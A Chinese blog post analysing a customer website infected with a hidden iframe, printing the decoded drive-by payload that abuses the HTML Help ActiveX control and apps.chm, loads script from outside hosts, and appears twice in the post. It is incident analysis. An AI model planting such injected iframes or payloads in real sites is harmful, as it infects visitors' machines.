客户网站被挂马的分析

最新推荐文章于 2023-01-21 16:39:37 发布
最新推荐文章于 2023-01-21 16:39:37 发布
阅读量1.4k 收藏
点赞数
文章标签: command bbs menu object chm javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iiprogram/article/details/571260
版权

打开网站,查看 源代码 ,查找<iframe 标签
就会找到在这段框架:
<iframe src="http://www.fengyajade.com/jiaozhu.htm" name="zhu"

width="0" height="0" frameborder="0">

这就是 打开网站为什么,杀毒软件提示有木马的原因..
经检查是在index.asp 最后一行。。

上面的框架调用了本地文件jiaozhu.htm

分析jiaozhu.htm 看源代码 是经过了java unescape 函数加密了。

解密后的真实代码是:

"<SCRIPT language=VScript src="bbs003302.gif"></SCRIPT>

<SCRIPT language=VScript src="bbs003302.css"></SCRIPT>

<HTML>

<BODY>

<div style="display:none">

<OBJECT id="cctv" type="application/x-oleobject"

classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">

<PARAM name="Command" value="Related Topics, MENU">

<PARAM name="Window" value="$global_ifl">

<PARAM name="Item1" value='command;file://C:/WINDOWS/Help/apps.chm'>

</OBJECT>

<OBJECT id="zgds" type="application/x-oleobject"

classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">

<PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window"

value="$global_ifl">

<PARAM name="Item1" value='command;javascript:eval("document.write

(/"<SCRIPT language=JScript

src=///"///"/"+String.fromCharCo

de(62)+/"</SCR/"+/"IPT/"+String.fromCharCode(62))")'>

</OBJECT>

</div>

<SCRIPT>cctv.Click();setTimeout("zgds.Click();",0);</SCRIPT>

</BODY>

</HTML>

"


在此我们分析代码就会注意到 在本地浏览器打开首页的时候,就会调用两个文件

bbs003302.gif
bbs003302.css
至于这两文件是什么,怎么做的,我也没有时间去研究了。。

通过系统你客户断自带的 file://C:/WINDOWS/Help/apps.chm 来达到执行木马
网上有很多关于chm生成木马的材料,可以 百度一下的。。

大概是通过 动感商城 注入 漏洞 获取你管理员密码了..从而上传 asp 类木马,修改你的程序,放置木马..

这个chm已经很早的漏洞了,没想到还有人在使用

这次代码为:

<SCRIPT LANGUAGE="JavaScript">

<!--
var Words

="%3Cscript%3Edocument.write%28unescape%28%27%253CHTML%253E%250D%250A%253Chead%253E%250D%250A%253C/h

ead%253E%250D%250A%253CBODY%253E%250D%250A%253Cdiv%2520style%253D%2522display%253Anone%2522%253E%250

D%250A%253COBJECT%2520id%253D%2522f1%2522%250D%250Atype%253D%2522application/x-oleobject%2522%250D%2

50Aclassid%253D%2522clsid%253Aadb880a6-d8ff-11cf-9377-00aa003b7a11%2522%253E%250D%250A%253CPARAM%252

0name%253D%2522Command%2522%2520value%253D%2522Related%2520Topics%252C%2520MENU%2522%253E%250D%250A%

253CPARAM%2520name%253D%2522Window%2522%2520value%253D%2522%2524global_ifl%2522%253E%250D%250A%253CP

ARAM%2520name%253D%2522Item1%2522%2520value%253D%2527command%253Bfile%253A//c%253A%255CWINDOWS%255CH

elp%255Capps.chm%2527%253E%250D%250A%253C/OBJECT%253E%250D%250A%253COBJECT%2520id%253D%2522f2%2522%2

520type%253D%2522application/x-oleobject%2522%2520classid%253D%2522clsid%253Aadb880a6-d8ff-11cf-9377

-00aa003b7a11%2522%253E%250D%250A%253CPARAM%2520name%253D%2522Command%2522%2520value%253D%2522Relate

d%2520Topics%252C%2520MENU%2522%253E%250D%250A%253CPARAM%2520name%253D%2522Window%2522%2520value%253

D%2522%2524global_ifl%2522%253E%250D%250A%253CPARAM%2520name%253D%2522Item1%2522%2520value%253D%2527

command%253Bjavascript%253Aeval%2528%2522document.write%2528%255C%2522%253CSCRIPT%2520language%25252

0%25253D%252520JScript%2520%2520src%253D%255C%255C%255C%2522http%3A//www.go2good.com/af/afu%252Egif%

255C%255C%255C%2522%255C%2522+String.fromCharCode%252862%2529+%255C%2522%253C/SCR%255C%2522+%255C%25

22IPT%255C%2522+String.fromCharCode%252862%2529%2529%2522%2529%2527%253E%250D%250A%253C/OBJECT%253E%

250D%250A%253C/div%253E%250D%250A%253Cscript%253E%250D%250Af1.Click%2528%2529%253BsetTimeout%2528%25

22f2.Click%2528%2529%253B%2522%252C0%2529%253B%250D%250A%253C/script%253E%250D%250A%253C/BODY%253E%2

50D%250A%253C/HTML%253E%27%29%29%3B%3C/script%3E"
function OutWord()
{
var NewWords;
NewWords = unescape(Words);
alert(NewWords);
}
OutWord();
// -->
</SCRIPT>

<HTML>
<head>
</head>
<BODY>
<div style="display:none">
<OBJECT id="f1"
type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Window" value="$global_ifl">
<PARAM name="Item1" value='command;file://c:/WINDOWS/Help/apps.chm'>
</OBJECT>
<OBJECT id="f2" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Window" value="$global_ifl">
<PARAM name="Item1" value='command;javascript:eval("document.write(/"<SCRIPT language%20%3D%20JScript  src=///"http://www.sssss.com/af/afsdfu.gif///"/"+String.fromCharCode(62)+/"</SCR/"+/"IPT/"+String.fromCharCode(62))")'>
</OBJECT>
</div>
<script>
f1.Click();setTimeout("f2.Click();",0);
</script>
</BODY>
</HTML>

"<SCRIPT language=VScript src="bbs003302.gif"></SCRIPT>

<SCRIPT language=VScript src="bbs003302.css"></SCRIPT>

<HTML>

<BODY>

<div style="display:none">

<OBJECT id="cctv" type="application/x-oleobject"

classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">

<PARAM name="Command" value="Related Topics, MENU">

<PARAM name="Window" value="$global_ifl">

<PARAM name="Item1" value='command;file://C:/WINDOWS/Help/apps.chm'>

</OBJECT>

<OBJECT id="zgds" type="application/x-oleobject"

classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">

<PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window"

value="$global_ifl">

<PARAM name="Item1" value='command;javascript:eval("document.write

(/"<SCRIPT language=JScript

src=///"///"/"+String.fromCharCo

de(62)+/"</SCR/"+/"IPT/"+String.fromCharCode(62))")'>

</OBJECT>

</div>

<SCRIPT>cctv.Click();setTimeout("zgds.Click();",0);</SCRIPT>

</BODY>

</HTML>

"


在此我们分析代码就会注意到 在本地浏览器打开首页的时候,就会调用两个文件

bbs003302.gif
bbs003302.css
至于这两文件是什么,怎么做的,我也没有时间去研究了。。

通过系统你客户断自带的 file://C:/WINDOWS/Help/apps.chm 来达到执行木马
网上有很多关于chm生成木马的材料,可以 百度一下的。。

大概是通过 动感商城 注入 漏洞 获取你管理员密码了..从而上传 asp 类木马,修改你的程序,放置木马..

这个chm已经很早的漏洞了,没想到还有人在使用

这次代码为:

<SCRIPT LANGUAGE="JavaScript">

<!--
var Words

="%3Cscript%3Edocument.write%28unescape%28%27%253CHTML%253E%250D%250A%253Chead%253E%250D%250A%253C/h

ead%253E%250D%250A%253CBODY%253E%250D%250A%253Cdiv%2520style%253D%2522display%253Anone%2522%253E%250

D%250A%253COBJECT%2520id%253D%2522f1%2522%250D%250Atype%253D%2522application/x-oleobject%2522%250D%2

50Aclassid%253D%2522clsid%253Aadb880a6-d8ff-11cf-9377-00aa003b7a11%2522%253E%250D%250A%253CPARAM%252

0name%253D%2522Command%2522%2520value%253D%2522Related%2520Topics%252C%2520MENU%2522%253E%250D%250A%

253CPARAM%2520name%253D%2522Window%2522%2520value%253D%2522%2524global_ifl%2522%253E%250D%250A%253CP

ARAM%2520name%253D%2522Item1%2522%2520value%253D%2527command%253Bfile%253A//c%253A%255CWINDOWS%255CH

elp%255Capps.chm%2527%253E%250D%250A%253C/OBJECT%253E%250D%250A%253COBJECT%2520id%253D%2522f2%2522%2

520type%253D%2522application/x-oleobject%2522%2520classid%253D%2522clsid%253Aadb880a6-d8ff-11cf-9377

-00aa003b7a11%2522%253E%250D%250A%253CPARAM%2520name%253D%2522Command%2522%2520value%253D%2522Relate

d%2520Topics%252C%2520MENU%2522%253E%250D%250A%253CPARAM%2520name%253D%2522Window%2522%2520value%253

D%2522%2524global_ifl%2522%253E%250D%250A%253CPARAM%2520name%253D%2522Item1%2522%2520value%253D%2527

command%253Bjavascript%253Aeval%2528%2522document.write%2528%255C%2522%253CSCRIPT%2520language%25252

0%25253D%252520JScript%2520%2520src%253D%255C%255C%255C%2522http%3A//www.go2good.com/af/afu%252Egif%

255C%255C%255C%2522%255C%2522+String.fromCharCode%252862%2529+%255C%2522%253C/SCR%255C%2522+%255C%25

22IPT%255C%2522+String.fromCharCode%252862%2529%2529%2522%2529%2527%253E%250D%250A%253C/OBJECT%253E%

250D%250A%253C/div%253E%250D%250A%253Cscript%253E%250D%250Af1.Click%2528%2529%253BsetTimeout%2528%25

22f2.Click%2528%2529%253B%2522%252C0%2529%253B%250D%250A%253C/script%253E%250D%250A%253C/BODY%253E%2

50D%250A%253C/HTML%253E%27%29%29%3B%3C/script%3E"
function OutWord()
{
var NewWords;
NewWords = unescape(Words);
alert(NewWords);
}
OutWord();
// -->
</SCRIPT>

<HTML>
<head>
</head>
<BODY>
<div style="display:none">
<OBJECT id="f1"
type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Window" value="$global_ifl">
<PARAM name="Item1" value='command;file://c:/WINDOWS/Help/apps.chm'>
</OBJECT>
<OBJECT id="f2" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Window" value="$global_ifl">
<PARAM name="Item1" value='command;javascript:eval("document.write(/"<SCRIPT language%20%3D%20JScript  src=///"http://www.sssss.com/af/afsdfu.gif///"/"+String.fromCharCode(62)+/"</SCR/"+/"IPT/"+String.fromCharCode(62))")'>
</OBJECT>
</div>
<script>
f1.Click();setTimeout("f2.Click();",0);
</script>
</BODY>
</HTML>

iiprogram
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
畜牧行业客户网站建设方案.ppt
11-21
后台设计应快速响应,减少延迟,同时配备流量统计系统,帮助管理员了解网站流量、访问时间、来源等,以便进行数据分析客户调查。 四、网站上线时间及费用预算 网站上线流程包括筹备期、制作期和上线后的调整。...
网站建设不可不知的秘密
07-17
文章提到了几种应对网站被攻击的策略: 1. **站内内容清理**:移除站内垃圾内容,减少安全隐患,避免成为攻击者的靶子。 2. **检查友情链接**:定期审查友情链接,确保它们不会成为攻击的入口,及时移除问题链接。 ...
CSS入门学习笔记+案例
m0_58585940的博客
01-21 3299
CSS出识入门、常见样式、案例:小米商城
黑客技术 详解电子书(CHM)木病毒
Penlee's Blog
07-17 2405
电子书木(以下所指的电子书均指CHM格式的电子书)?其实这种方式的木传播方法很早就有出现,但好象是多以网页木的形式存在的,也就是把所谓的一个网页木加入电子书里,这种效果和一般的网页木的效果一样受到漏洞范围的限制,因此一直没引起人们的太大关注,也许大家觉得这样还不如直接的网页木来得方便,其实不然,因为电子书相对与网页而言有许多“优点”,当然这里所谓的“优点”是指在传播木方面而言的!
CHM(简单高效)
Anonymous
11-13 4791
这是现在网上比较普遍的一种中方法,主要就是利用CHM可以将可执行文件包含其中,并且利用简单的html就可以让程序自动运行,制作方法非常简单,主要就是木的选择,由于不知道对方机器上是否用了杀毒软件,也不知道是什么杀毒软件,所以要用绝对不被查杀的木或是后门程序(自己加壳的方法也不错‘最好是一些不太知名的加壳软件),另外还有用到CHM制作工具,推荐QuickCHM。将木和html文件放在同一文件
套壳开发把网址直接打包成app(Hbuilder)
书写人生
05-23 3759
1.安装hbuilder 百度下载hbuilder安装 2.android包打包教程 A.新建一个移动app项目 B.新建完成会有下面目录 index.html可以自定义修改页面效果 mainifest.json主要用于修改app设置 C.点击mainifest.json可以任意设置logo,启动页,及所需权限,设置完成之后保存 D.打包 找到项目右键点击->发行->原生包 按...
追查到的某网页木代码
liswa 电脑备忘录
03-31 1205
找一个很旧的软件的最新版本时,到其网页后因发觉自己的电脑中招了,我可是winxp+sp2,让其上网自动更新的啊,而且安装了Norton,照样让木给运行了,后来分析,是一个魔兽世界的盗号木分析后清楚倒不难(讨厌的是,它居然试图注入了我的大部分在运行进程,累我电脑重启了)分析其网页代码,剥离解码后,得到的代码如下://=======================================
畜牧行业客户网站建设方案.pptx
11-04
流量统计系统能帮助管理员了解网站流量和用户行为,以便进行数据分析客户调查。 四、网站上线时间及费用预算 网站的开发分为筹备期、制作期和上线期。筹备期主要确定网站架构和视觉风格;制作期涉及内容发布系统...
信息安全应急响应系列之网站入侵分析.pptx
12-01
\n\n网站被入侵时,通常会出现诸如网页篡改、异常服务、非法账号和页面等现象。这些都表明网站的安全已经被破坏,需要立即进行分析和处理。入侵手段的分析涉及对攻击者的技巧和工具的了解,这可能包括SQL注入、...
网站系统安全解决方案.doc
最新发布
05-07
- **网页**:在页面中植入木程序,虽不影响网站本身,但会危害访问用户的安全。 - **在线业务被攻击**:针对提供在线服务的网站进行拒绝服务攻击,会导致业务中断,造成经济损失和社会动荡。 - **机密数据...
RGB、Lab等颜色空间的区别
灵思致远Leansmall的博客
11-10 2920
https://blog.csdn.net/self_mind/article/details/50679836 RGB颜色空间 RGB颜色是红色(Red)、绿色(Green)和蓝色(Blue)三基色的字母缩写。RGB色彩模式是通过三种基本颜色的不同程度的迭加来产生各种各样的不同颜色。这个标准能够涵盖人类视力所能感知的所有颜色,是目前运用广泛的颜色系统之一。 RGB(red,green,bl...
Change Zabbix Logo
weixin_34192816的博客
05-25 476
refer to:http://www.bernardolankheet.com.br/alterando-logo-zabbix-3-0/ https://www.zabbix.com/forum/showthread.php?t=52524 2.2, 2.4 : styles/icon.cssCode:.zabbix_logo { height: 31px;...
[BZOJ4596][SHOI2016]黑暗前的幻想乡(矩阵树定理+容斥)
薇小薇
06-05 205
题目: 我是超链接 题意: n个点要修n-1条路(形成一棵树)。有n-1个公司,每个公司可以修建某些路径。求每个公司恰好修建一条路能修成树的方案数。 题解: 生成树的数量要考虑矩阵树定理,但是如果把所有的边加进去,不能保证每个公司都修一条路。 我们考虑容斥,其实答案就是:至少不选0个公司-至少不选1个公司+至少不选2个公司…… 我们可以二进制枚举哪些公司选,剩下的就是不选的。 代码...
【LeetCode题解】20_有效的括号(Valid-Parentheses)
weixin_30716725的博客
06-17 80
目录 20_有效的括号(Valid-Parentheses) 描述 解法 思路 Java 实现 Python 实现 复杂度分析 20_有效的括号(Valid-Parenthe...
网站的真正原因及原理分析
好好学习,天天向上。
12-14 3298
<br />什么是ARP<br />   地址解析协议(Address Resolution Protocol,ARP)是在仅知道主机的IP地址时确定其物理地址的一种协议。因IPv4和以太网的广泛应用,其主要用作将IP地址翻译为以太网的MAC地址,但其也能在ATM和FDDIIP网络中使用。从IP地址到物理地址的映射有两种方式:表格方式和非表格方式。ARP具体说来就是将网络层(IP层,也就是相当于OSI的第三层)地址解析为数据连接层(MAC层,也就是相当于OSI的第二层)的MAC地址。<br />   假设:
一些常用的javascript命令
喜哥的点滴积累
09-05 1843
1. oncontextmenu="window.event.returnValue=false" 将彻底屏蔽鼠标右键 no 可用于Table 2. 取消选取、防止复制 3. onpaste="return false" 不准粘贴 4. oncopy="return f
Android颜色对照表 (左边是颜色示例,右边是颜色对应的16进制代码)---Android开发必备!!!...
java开发指南博客 【转载】
07-25 763
颜色代码大全 &lt;wbr&gt;AA 指定透明度。 00 是完全透明。 FF 是完全不透明。超出取值范围的值将被恢复为默认值。&lt;/wbr&gt; &lt;wbr&gt;&lt;wbr&gt;&lt;/wbr&gt;&lt;/wbr&gt; &lt;wbr&gt;&lt;wbr&gt;&lt;/wbr&gt;&am
怎么看网站的工具
03-31
作为AI,我无法提供具体的工具,但是以下是一些检测网站是否被的方法: 1. 使用杀毒软件扫描:使用一款可靠的杀毒软件,对网站进行全面扫描,以查找是否存在恶意软件。 2. 检查网站的安全证书:如果网站拥有有效的安全证书,那么访问该网站时浏览器会显示一个锁形状的图标,表示该网站是安全的。 3. 检查网站的源代码:检查网站的源代码,查看是否存在恶意代码,例如JavaScript等。 4. 检查网站的访问速度:如果网站的访问速度变慢,可能是因为网站被黑客攻击,导致网站的性能下降。 5. 使用在线工具:在线工具如Google Safe Browsing、VirusTotal等可以帮助检测网站是否被。 请注意,这些方法都是相对可靠的,但不能保证100%准确性。如果怀疑网站,应该尽快联系网站管理员或专业的安全团队进行处理。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值